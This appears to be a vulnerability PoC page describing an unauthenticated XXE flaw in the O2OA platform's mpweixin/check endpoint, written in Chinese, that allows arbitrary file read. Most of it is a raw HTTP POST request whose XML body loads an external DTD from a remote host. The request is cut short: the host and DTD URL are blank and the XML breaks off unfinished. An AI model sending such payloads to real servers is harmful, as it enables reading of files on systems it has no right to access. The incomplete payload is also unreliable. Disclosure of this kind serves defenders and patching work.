o2oa /x_program_center/jaxrs/mpweixin/check XML 外部实体注入漏洞

2026-01-23 o2oa PoC Public

Description

O2OA 平台 v6.1.0 至 v9.0.0 版本中,/x_program_center/jaxrs/mpweixin/check 接口存在 XML 实体注入(XXE)漏洞。由于 O2OA 使用的 Java XML 解析器对内部 DTD 实体嵌套进行了限制,攻击者可通过构造外部 DTD 的方式进行利用。攻击者无需登录即可创建并引用恶意 DTD 文件,通过参数实体嵌套触发 Java 解析器错误回显,从而实现任意文件读取。

PoC

POST /x_program_center/jaxrs/mpweixin/check?signature=1&timestamp=1&nonce=1&echostr=1 HTTP/1.1
Host: 
Content-Type: text/xml
Content-Length: 183
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root [

	<!ENTITY % remote SYSTEM "http://.dtd">

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities